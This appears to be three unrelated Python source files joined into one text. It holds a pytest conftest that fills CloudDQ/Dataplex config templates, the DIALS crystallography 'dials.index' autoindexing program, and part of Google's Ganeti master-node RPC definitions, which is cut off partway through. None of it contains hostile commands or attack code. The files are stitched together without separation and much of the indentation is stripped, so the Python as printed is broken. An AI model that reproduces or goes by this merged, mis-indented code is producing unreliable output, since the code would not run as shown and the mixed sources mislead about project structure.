lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield configs_path.absolute()
if os.path.exists(temp_clouddq_dir):
shutil.rmtree(temp_clouddq_dir)
@pytest.fixture(scope="function")
def temp_configs_from_file(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_configs_file_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_configs")
    # Copy over tests/resources/configs.yml
registry_defaults = shutil.copyfile(source_configs_file_path, temp_clouddq_dir)
# Prepare entity_uri configs
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
os.unlink(temp_clouddq_dir)
@pytest.fixture(scope="function")
def test_default_dataplex_configs_cache_from_file(temp_configs_from_file,
test_dq_dataplex_client,
test_dataplex_metadata_defaults_configs,
tmp_path,
test_bigquery_client,):
temp_path = Path(tmp_path).joinpath("clouddq_test_configs_cache")
temp_path.mkdir()
with working_directory(temp_path):
configs_cache = prepare_configs_cache(configs_path=temp_configs_from_file)
target_rule_binding_ids = [
row["id"] for row in
configs_cache._cache_db.query("select id from rule_bindings")
]
configs_cache.resolve_dataplex_entity_uris(
client=test_dq_dataplex_client,
bigquery_client=test_bigquery_client,
default_configs=test_dataplex_metadata_defaults_configs,
target_rule_binding_ids=target_rule_binding_ids
)
yield configs_cache
@pytest.fixture(scope="function")
def temp_configs_from_dq_rules_config_file(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_dq_rules_configs_file_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_dq_rules_configs")
    # Copy over tests/resources/dq_rules_configs.yml
registry_defaults = shutil.copyfile(source_dq_rules_configs_file_path, temp_clouddq_dir)
# Prepare entity_uri configs
with open(registry_defaults) as source_file:
lines = source_file.read()
with open(registry_defaults, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
os.unlink(temp_clouddq_dir)
@pytest.fixture(scope="function")
def temp_configs_from_dq_advanced_rules_configs(
gcp_project_id,
gcp_dataplex_bigquery_dataset_id,
gcp_dataplex_region,
gcp_dataplex_lake_name,
gcp_dataplex_zone_id,
source_dq_advanced_rules_configs_path,
tmp_path):
# Create temp directory
temp_clouddq_dir = Path(tmp_path).joinpath("clouddq_test_dq_advanced_rules_configs")
    # Copy over docs/examples/advanced_rules
registry_defaults = shutil.copytree(source_dq_advanced_rules_configs_path, temp_clouddq_dir)
# Prepare entity_uri configs
for root, _, files in os.walk(registry_defaults):
for file in files:
if '.yaml' in file or '.yml' in file:
source_filename = os.path.join(root, file)
with open(source_filename) as source_file:
lines = source_file.read()
with open(source_filename, "w") as source_file:
lines = lines.replace("<my-gcp-dataplex-lake-id>", gcp_dataplex_lake_name)
lines = lines.replace("<my-gcp-dataplex-region-id>", gcp_dataplex_region)
lines = lines.replace("<my-gcp-project-id>", gcp_project_id)
lines = lines.replace("<my-gcp-dataplex-zone-id>", gcp_dataplex_zone_id)
lines = lines.replace("<my_bigquery_dataset_id>", gcp_dataplex_bigquery_dataset_id)
lines = lines.replace("<my_bigquery_input_data_dataset_id>", gcp_dataplex_bigquery_dataset_id)
source_file.write(lines)
yield temp_clouddq_dir.absolute()
if os.path.exists(temp_clouddq_dir):
shutil.rmtree(temp_clouddq_dir)
@pytest.fixture(scope="session")
def runner():
return click.testing.CliRunner()
def pytest_configure(config):
config.addinivalue_line("markers", "dataplex: mark as tests for dataplex integration test.")
def pytest_addoption(parser):
parser.addoption(
"--run-dataplex", action="store_true", default=False, help="run dataplex integraiton tests"
)
def pytest_collection_modifyitems(config, items):
if config.getoption("--run-dataplex"):
return
    skip_dataplex = pytest.mark.skip(reason="need --run-dataplex option to run")
for item in items:
if "dataplex" in item.keywords:
item.add_marker(skip_dataplex)
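# Illustrative sketch (not part of this conftest): a test opts in to the
# "dataplex" marker registered above so that it is skipped unless pytest is
# invoked with --run-dataplex. The test name and body here are hypothetical.
#
#   @pytest.mark.dataplex
#   def test_dataplex_client_smoke(test_dq_dataplex_client):
#       assert test_dq_dataplex_client is not None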
|
|
# DIALS_ENABLE_COMMAND_LINE_COMPLETION
from __future__ import annotations
import concurrent.futures
import copy
import logging
import sys
import iotbx.phil
from dxtbx.model.experiment_list import ExperimentList
from dials.algorithms.indexing import DialsIndexError, indexer
from dials.array_family import flex
from dials.util import log, show_mail_handle_errors
from dials.util.options import ArgumentParser, reflections_and_experiments_from_files
from dials.util.slice import slice_reflections
from dials.util.version import dials_version
logger = logging.getLogger("dials.command_line.index")
help_message = """
This program attempts to perform autoindexing on strong spots output by the
program dials.find_spots. The program is called with an "imported.expt" file
(as generated by dials.import) and a "strong.refl" file (as generated by
dials.find_spots). If one or more lattices are identified given the input
list of strong spots, then the crystal orientation and experimental geometry
are refined to minimise the differences between the observed and predicted
spot centroids. The program will output an "indexed.expt" file which
is similar to the input "imported.expt" file, but with the addition of the
crystal model(s), and an "indexed.refl" file which is similar to the input
"strong.refl" file, but with the addition of miller indices and predicted
spot centroids.
dials.index provides both one-dimensional and three-dimensional fast Fourier
transform (FFT) based methods. These can be chosen by setting the parameters
indexing.method=fft1d or indexing.method=fft3d. By default the program searches
for a primitive lattice, and then proceeds with refinement in space group P1.
If the unit_cell and space_group parameters are set, then the program will
only accept solutions which are consistent with these parameters. Space group
constraints will be enforced in refinement as appropriate.
Examples::
dials.index imported.expt strong.refl
dials.index imported.expt strong.refl unit_cell=37,79,79,90,90,90 space_group=P43212
dials.index imported.expt strong.refl indexing.method=fft1d
"""
phil_scope = iotbx.phil.parse(
"""\
include scope dials.algorithms.indexing.indexer.phil_scope
indexing {
include scope dials.algorithms.indexing.lattice_search.basis_vector_search_phil_scope
image_range = None
.help = "Range in images to slice a sequence. The number of arguments"
"must be a factor of two. Each pair of arguments gives a range"
"that follows C conventions (e.g. j0 <= j < j1) when slicing the"
"reflections by observed centroid."
.type = ints(size=2)
.multiple = True
joint_indexing = True
.type = bool
}
include scope dials.algorithms.refinement.refiner.phil_scope
output {
experiments = indexed.expt
.type = path
reflections = indexed.refl
.type = path
log = dials.index.log
.type = str
}
""",
process_includes=True,
)
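# Illustrative only: because image_range is a multiple-valued parameter, more
# than one slice can be supplied by repeating it on the command line, e.g.
#
#   dials.index imported.expt strong.refl \
#       indexing.image_range=1,100 indexing.image_range=201,300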
# override default refinement parameters
phil_overrides = phil_scope.fetch(
source=iotbx.phil.parse(
"""\
refinement {
reflections {
reflections_per_degree=100
}
}
"""
)
)
working_phil = phil_scope.fetch(sources=[phil_overrides])
def _index_experiments(experiments, reflections, params, known_crystal_models=None):
idxr = indexer.Indexer.from_parameters(
reflections,
experiments,
known_crystal_models=known_crystal_models,
params=params,
)
idxr.index()
idx_refl = copy.deepcopy(idxr.refined_reflections)
idx_refl.extend(idxr.unindexed_reflections)
return idxr.refined_experiments, idx_refl
def index(experiments, reflections, params):
"""
Index the input experiments and reflections.
Args:
experiments: The experiments to index
reflections (list): A list of reflection tables containing strong spots
params: An instance of the indexing phil scope
Returns:
(tuple): tuple containing:
experiments: The indexed experiment list
reflections (dials.array_family.flex.reflection_table):
The indexed reflections
Raises:
ValueError: `reflections` is an empty list or `experiments` contains a
combination of sequence and stills data.
dials.algorithms.indexing.DialsIndexError: Indexing failed.
"""
if experiments.crystals()[0] is not None:
known_crystal_models = experiments.crystals()
else:
known_crystal_models = None
if len(reflections) == 0:
raise ValueError("No reflection lists found in input")
elif len(reflections) == 1:
if "imageset_id" not in reflections[0]:
reflections[0]["imageset_id"] = reflections[0]["id"]
elif len(reflections) > 1:
assert len(reflections) == len(experiments)
for i in range(len(reflections)):
reflections[i]["imageset_id"] = flex.int(len(reflections[i]), i)
if i > 0:
reflections[0].extend(reflections[i])
reflections = reflections[0]
if params.indexing.image_range:
reflections = slice_reflections(reflections, params.indexing.image_range)
if len(experiments) == 1 or params.indexing.joint_indexing:
indexed_experiments, indexed_reflections = _index_experiments(
experiments,
reflections,
copy.deepcopy(params),
known_crystal_models=known_crystal_models,
)
else:
indexed_experiments = ExperimentList()
with concurrent.futures.ProcessPoolExecutor(
max_workers=params.indexing.nproc
) as pool:
futures = []
for i_expt, expt in enumerate(experiments):
refl = reflections.select(reflections["imageset_id"] == i_expt)
refl["imageset_id"] = flex.size_t(len(refl), 0)
futures.append(
pool.submit(
_index_experiments,
ExperimentList([expt]),
refl,
copy.deepcopy(params),
known_crystal_models=known_crystal_models,
)
)
tables_list = []
for future in concurrent.futures.as_completed(futures):
try:
idx_expts, idx_refl = future.result()
except Exception as e:
print(e)
else:
if idx_expts is None:
continue
# Update the experiment ids by incrementing by the number of indexed
# experiments already in the list
##FIXME below, is i_expt correct - or should it be the
# index of the 'future'?
idx_refl["imageset_id"] = flex.size_t(idx_refl.size(), i_expt)
tables_list.append(idx_refl)
indexed_experiments.extend(idx_expts)
indexed_reflections = flex.reflection_table.concat(tables_list)
return indexed_experiments, indexed_reflections
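# A minimal programmatic sketch of calling index() directly, shown here as a
# comment (the supported entry point is run() below). It assumes an
# "imported.expt" and "strong.refl" produced by dials.import/dials.find_spots:
#
#   from dials.array_family import flex
#   from dxtbx.model.experiment_list import ExperimentList
#
#   experiments = ExperimentList.from_file("imported.expt", check_format=False)
#   reflections = [flex.reflection_table.from_file("strong.refl")]
#   params = working_phil.extract()
#   indexed_expts, indexed_refl = index(experiments, reflections, params)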
@show_mail_handle_errors()
def run(args=None, phil=working_phil):
usage = "dials.index [options] models.expt strong.refl"
parser = ArgumentParser(
usage=usage,
phil=phil,
read_reflections=True,
read_experiments=True,
check_format=False,
epilog=help_message,
)
params, options = parser.parse_args(args=args, show_diff_phil=False)
# Configure the logging
log.config(verbosity=options.verbose, logfile=params.output.log)
logger.info(dials_version())
# Log the diff phil
diff_phil = parser.diff_phil.as_str()
if diff_phil != "":
logger.info("The following parameters have been modified:\n")
logger.info(diff_phil)
reflections, experiments = reflections_and_experiments_from_files(
params.input.reflections, params.input.experiments
)
if len(experiments) == 0:
parser.print_help()
return
try:
indexed_experiments, indexed_reflections = index(
experiments, reflections, params
)
except (DialsIndexError, ValueError) as e:
sys.exit(str(e))
# Save experiments
logger.info("Saving refined experiments to %s", params.output.experiments)
assert indexed_experiments.is_consistent()
indexed_experiments.as_file(params.output.experiments)
# Save reflections
logger.info("Saving refined reflections to %s", params.output.reflections)
indexed_reflections.as_file(filename=params.output.reflections)
if __name__ == "__main__":
run()
|
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""RPC definitions for communication between master and node daemons.
RPC definition fields:
- Name as string
- L{SINGLE} for single-node calls, L{MULTI} for multi-node
- Name resolver option(s), can be callable receiving all arguments in a tuple
- Timeout (e.g. L{constants.RPC_TMO_NORMAL}), or callback receiving all
arguments in a tuple to calculate timeout
- List of arguments as tuples
- Name as string
- Argument kind used for encoding/decoding
- Description for docstring (can be C{None})
- Custom body encoder (e.g. for preparing per-node bodies)
- Return value wrapper (e.g. for deserializing into L{objects}-based objects)
- Short call description for docstring
"""
from ganeti import constants
from ganeti import utils
from ganeti import objects
# Guidelines for choosing timeouts:
# - call used during watcher: timeout of 1min, constants.RPC_TMO_URGENT
# - trivial (but be sure it is trivial)
# (e.g. reading a file): 5min, constants.RPC_TMO_FAST
# - other calls: 15 min, constants.RPC_TMO_NORMAL
# - special calls (instance add, etc.):
# either constants.RPC_TMO_SLOW (1h) or huge timeouts
SINGLE = "single-node"
MULTI = "multi-node"
ACCEPT_OFFLINE_NODE = object()
# Constants for encoding/decoding
(ED_OBJECT_DICT,
ED_OBJECT_DICT_LIST,
ED_INST_DICT,
ED_INST_DICT_HVP_BEP_DP,
ED_NODE_TO_DISK_DICT_DP,
ED_INST_DICT_OSP_DP,
ED_IMPEXP_IO,
ED_FILE_DETAILS,
ED_FINALIZE_EXPORT_DISKS,
ED_COMPRESS,
ED_BLOCKDEV_RENAME,
ED_DISKS_DICT_DP,
ED_MULTI_DISKS_DICT_DP,
ED_SINGLE_DISK_DICT_DP,
ED_NIC_DICT,
ED_DEVICE_DICT) = range(1, 17)
def _Prepare(calls):
"""Converts list of calls to dictionary.
"""
return utils.SequenceToDict(calls)
def _MigrationStatusPostProc(result):
"""Post-processor for L{rpc.node.RpcRunner.call_instance_get_migration_status}
"""
if not result.fail_msg and result.payload is not None:
result.payload = objects.MigrationStatus.FromDict(result.payload)
return result
def _BlockdevFindPostProc(result):
"""Post-processor for L{rpc.node.RpcRunner.call_blockdev_find}.
"""
if not result.fail_msg and result.payload is not None:
result.payload = objects.BlockDevStatus.FromDict(result.payload)
return result
def _BlockdevGetMirrorStatusPostProc(result):
"""Post-processor for call_blockdev_getmirrorstatus.
"""
if not result.fail_msg:
result.payload = map(objects.BlockDevStatus.FromDict, result.payload)
return result
def _BlockdevGetMirrorStatusMultiPreProc(node, args):
"""Prepares the appropriate node values for blockdev_getmirrorstatus_multi.
"""
# there should be only one argument to this RPC, already holding a
# node->disks dictionary, we just need to extract the value for the
# current node
assert len(args) == 1
return [args[0][node]]
def _BlockdevGetMirrorStatusMultiPostProc(result):
"""Post-processor for call_blockdev_getmirrorstatus_multi.
"""
if not result.fail_msg:
for idx, (success, status) in enumerate(result.payload):
if success:
result.payload[idx] = (success, objects.BlockDevStatus.FromDict(status))
return result
def _NodeInfoPreProc(node, args):
"""Prepare the storage_units argument for node_info calls."""
assert len(args) == 2
# The storage_units argument is either a dictionary with one value for each
# node, or a fixed value to be used for all the nodes
if type(args[0]) is dict:
return [args[0][node], args[1]]
else:
return args
def _ImpExpStatusPostProc(result):
"""Post-processor for import/export status.
@rtype: Payload containing list of L{objects.ImportExportStatus} instances
@return: Returns a list of the state of each named import/export or None if
a status couldn't be retrieved
"""
if not result.fail_msg:
decoded = []
for i in result.payload:
if i is None:
decoded.append(None)
continue
decoded.append(objects.ImportExportStatus.FromDict(i))
result.payload = decoded
return result
def _TestDelayTimeout((duration, )):
"""Calculate timeout for "test_delay" RPC.
"""
return int(duration + 5)
_FILE_STORAGE_CALLS = [
("file_storage_dir_create", SINGLE, None, constants.RPC_TMO_FAST, [
("file_storage_dir", None, "File storage directory"),
], None, None, "Create the given file storage directory"),
("file_storage_dir_remove", SINGLE, None, constants.RPC_TMO_FAST, [
("file_storage_dir", None, "File storage directory"),
], None, None, "Remove the given file storage directory"),
("file_storage_dir_rename", SINGLE, None, constants.RPC_TMO_FAST, [
("old_file_storage_dir", None, "Old name"),
("new_file_storage_dir", None, "New name"),
], None, None, "Rename file storage directory"),
]
_STORAGE_CALLS = [
("storage_list", MULTI, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("fields", None, None),
], None, None, "Get list of storage units"),
("storage_modify", SINGLE, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("changes", None, None),
], None, None, "Modify a storage unit"),
("storage_execute", SINGLE, None, constants.RPC_TMO_NORMAL, [
("su_name", None, None),
("su_args", None, None),
("name", None, None),
("op", None, None),
], None, None, "Executes an operation on a storage unit"),
]
_INSTANCE_CALLS = [
("instance_info", SINGLE, None, constants.RPC_TMO_URGENT, [
("instance", None, "Instance name"),
("hname", None, "Hypervisor type"),
("hvparams", None, "Hypervisor parameters"),
], None, None, "Returns information about a single instance"),
("all_instances_info", MULTI, None, constants.RPC_TMO_URGENT, [
("hypervisor_list", None, "Hypervisors to query for instances"),
("all_hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
], None, None,
"Returns information about all instances on the given nodes"),
("instance_list", MULTI, None, constants.RPC_TMO_URGENT, [
("hypervisor_list", None, "Hypervisors to query for instances"),
("hvparams", None, "Hvparams of all hypervisors"),
], None, None, "Returns the list of running instances on the given nodes"),
("instance_reboot", SINGLE, None, constants.RPC_TMO_NORMAL, [
("inst", ED_INST_DICT, "Instance object"),
("reboot_type", None, None),
("shutdown_timeout", None, None),
("reason", None, "The reason for the reboot"),
], None, None, "Returns the list of running instances on the given nodes"),
("instance_shutdown", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("timeout", None, None),
("reason", None, "The reason for the shutdown"),
], None, None, "Stops an instance"),
("instance_balloon_memory", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("memory", None, None),
], None, None, "Modify the amount of an instance's runtime memory"),
("instance_run_rename", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
("old_name", None, None),
("debug", None, None),
], None, None, "Run the OS rename script for an instance"),
("instance_migratable", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None, "Checks whether the given instance can be migrated"),
("migration_info", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None,
"Gather the information necessary to prepare an instance migration"),
("accept_instance", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("info", None, "Result for the call_migration_info call"),
("target", None, "Target hostname (usually an IP address)"),
], None, None, "Prepare a node to accept an instance"),
("instance_finalize_migration_dst", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("info", None, "Result for the call_migration_info call"),
("success", None, "Whether the migration was a success or failure"),
], None, None, "Finalize any target-node migration specific operation"),
("instance_migrate", SINGLE, None, constants.RPC_TMO_SLOW, [
("cluster_name", None, "Cluster name"),
("instance", ED_INST_DICT, "Instance object"),
("target", None, "Target node name"),
("live", None, "Whether the migration should be done live or not"),
], None, None, "Migrate an instance"),
("instance_finalize_migration_src", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
("success", None, "Whether the migration succeeded or not"),
("live", None, "Whether the user requested a live migration or not"),
], None, None, "Finalize the instance migration on the source node"),
("instance_get_migration_status", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
], None, _MigrationStatusPostProc, "Report migration status"),
("instance_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance_hvp_bep", ED_INST_DICT_HVP_BEP_DP, None),
("startup_paused", None, None),
("reason", None, "The reason for the startup"),
], None, None, "Starts an instance"),
("instance_os_add", SINGLE, None, constants.RPC_TMO_1DAY, [
("instance_osp", ED_INST_DICT_OSP_DP, "Tuple: (target instance,"
" temporary OS parameters"
" overriding configuration)"),
("reinstall", None, "Whether the instance is being reinstalled"),
("debug", None, "Debug level for the OS install script to use"),
], None, None, "Installs an operative system onto an instance"),
("hotplug_device", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("action", None, "Hotplug Action"),
("dev_type", None, "Device type"),
("device", ED_DEVICE_DICT, "Device dict"),
("extra", None, "Extra info for device (dev_path for disk)"),
("seq", None, "Device seq"),
], None, None, "Hoplug a device to a running instance"),
("hotplug_supported", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None, "Check if hotplug is supported"),
("instance_metadata_modify", SINGLE, None, constants.RPC_TMO_URGENT, [
("instance", None, "Instance object"),
], None, None, "Modify instance metadata"),
]
_IMPEXP_CALLS = [
("import_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("opts", ED_OBJECT_DICT, None),
("instance", ED_INST_DICT, None),
("component", None, None),
("dest", ED_IMPEXP_IO, "Import destination"),
], None, None, "Starts an import daemon"),
("export_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("opts", ED_OBJECT_DICT, None),
("host", None, None),
("port", None, None),
("instance", ED_INST_DICT, None),
("component", None, None),
("source", ED_IMPEXP_IO, "Export source"),
], None, None, "Starts an export daemon"),
("impexp_status", SINGLE, None, constants.RPC_TMO_FAST, [
("names", None, "Import/export names"),
], None, _ImpExpStatusPostProc, "Gets the status of an import or export"),
("impexp_abort", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Import/export name"),
], None, None, "Aborts an import or export"),
("impexp_cleanup", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Import/export name"),
], None, None, "Cleans up after an import or export"),
("export_info", SINGLE, None, constants.RPC_TMO_FAST, [
("path", None, None),
], None, None, "Queries the export information in a given path"),
("finalize_export", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, None),
("snap_disks", ED_FINALIZE_EXPORT_DISKS, None),
], None, None, "Request the completion of an export operation"),
("export_list", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Gets the stored exports list"),
("export_remove", SINGLE, None, constants.RPC_TMO_FAST, [
("export", None, None),
], None, None, "Requests removal of a given export"),
]
_X509_CALLS = [
("x509_cert_create", SINGLE, None, constants.RPC_TMO_NORMAL, [
("validity", None, "Validity in seconds"),
], None, None, "Creates a new X509 certificate for SSL/TLS"),
("x509_cert_remove", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Certificate name"),
], None, None, "Removes a X509 certificate"),
]
_BLOCKDEV_CALLS = [
("bdev_sizes", MULTI, None, constants.RPC_TMO_URGENT, [
("devices", None, None),
], None, None,
"Gets the sizes of requested block devices present on a node"),
("blockdev_create", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("size", None, None),
("owner", None, None),
("on_primary", None, None),
("info", None, None),
("exclusive_storage", None, None),
], None, None, "Request creation of a given block device"),
("blockdev_convert", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev_src", ED_SINGLE_DISK_DICT_DP, None),
("bdev_dest", ED_SINGLE_DISK_DICT_DP, None),
], None, None,
"Request the copy of the source block device to the destination one"),
("blockdev_image", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("image", None, None),
("size", None, None),
], None, None,
"Request to dump an image with given size onto a block device"),
("blockdev_wipe", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("offset", None, None),
("size", None, None),
], None, None,
"Request wipe at given offset with given size of a block device"),
("blockdev_remove", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
], None, None, "Request removal of a given block device"),
("blockdev_pause_resume_sync", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
("pause", None, None),
], None, None, "Request a pause/resume of given block device"),
("blockdev_assemble", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
("instance", ED_INST_DICT, None),
("on_primary", None, None),
("idx", None, None),
], None, None, "Request assembling of a given block device"),
("blockdev_shutdown", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
], None, None, "Request shutdown of a given block device"),
("blockdev_addchildren", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("ndevs", ED_DISKS_DICT_DP, None),
], None, None,
"Request adding a list of children to a (mirroring) device"),
("blockdev_removechildren", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("ndevs", ED_DISKS_DICT_DP, None),
], None, None,
"Request removing a list of children from a (mirroring) device"),
("blockdev_close", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance_name", None, None),
("disks", ED_DISKS_DICT_DP, None),
], None, None, "Closes the given block devices"),
("blockdev_getdimensions", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_MULTI_DISKS_DICT_DP, None),
], None, None, "Returns size and spindles of the given disks"),
("drbd_disconnect_net", MULTI, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
], None, None,
"Disconnects the network of the given drbd devices"),
("drbd_attach_net", MULTI, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
("instance_name", None, None),
("multimaster", None, None),
], None, None, "Connects the given DRBD devices"),
("drbd_wait_sync", MULTI, None, constants.RPC_TMO_SLOW, [
("disks", ED_DISKS_DICT_DP, None),
], None, None,
"Waits for the synchronization of drbd devices is complete"),
("drbd_needs_activation", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_MULTI_DISKS_DICT_DP, None),
], None, None,
"Returns the drbd disks which need activation"),
("blockdev_grow", SINGLE, None, constants.RPC_TMO_NORMAL, [
("cf_bdev", ED_SINGLE_DISK_DICT_DP, None),
("amount", None, None),
("dryrun", None, None),
("backingstore", None, None),
("es_flag", None, None),
], None, None, "Request growing of the given block device by a"
" given amount"),
("blockdev_snapshot", SINGLE, None, constants.RPC_TMO_NORMAL, [
("cf_bdev", ED_SINGLE_DISK_DICT_DP, None),
("snap_name", None, None),
("snap_size", None, None),
], None, None, "Export a given disk to another node"),
("blockdev_rename", SINGLE, None, constants.RPC_TMO_NORMAL, [
("devlist", ED_BLOCKDEV_RENAME, None),
], None, None, "Request rename of the given block devices"),
("blockdev_find", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
], None, _BlockdevFindPostProc,
"Request identification of a given block device"),
("blockdev_getmirrorstatus", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
], None, _BlockdevGetMirrorStatusPostProc,
"Request status of a (mirroring) device"),
("blockdev_getmirrorstatus_multi", MULTI, None, constants.RPC_TMO_NORMAL, [
("node_disks", ED_NODE_TO_DISK_DICT_DP, None),
], _BlockdevGetMirrorStatusMultiPreProc,
_BlockdevGetMirrorStatusMultiPostProc,
"Request status of (mirroring) devices from multiple nodes"),
("blockdev_setinfo", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
("info", None, None),
], None, None, "Sets metadata information on a given block device"),
]
_OS_CALLS = [
("os_diagnose", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Request a diagnose of OS definitions"),
("os_validate", MULTI, None, constants.RPC_TMO_FAST, [
("required", None, None),
("name", None, None),
("checks", None, None),
("params", None, None),
("force_variant", None, None),
], None, None, "Run a validation routine for a given OS"),
("os_export", SINGLE, None, constants.RPC_TMO_FAST, [
("instance", ED_INST_DICT, None),
("override_env", None, None),
], None, None, "Export an OS for a given instance"),
]
_EXTSTORAGE_CALLS = [
("extstorage_diagnose", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Request a diagnose of ExtStorage Providers"),
]
_NODE_CALLS = [
("node_has_ip_address", SINGLE, None, constants.RPC_TMO_FAST, [
("address", None, "IP address"),
], None, None, "Checks if a node has the given IP address"),
("node_info", MULTI, None, constants.RPC_TMO_URGENT, [
("storage_units", None,
"List of tuples '<storage_type>,<key>,[<param>]' to ask for disk space"
" information; the parameter list varies depending on the storage_type"),
("hv_specs", None,
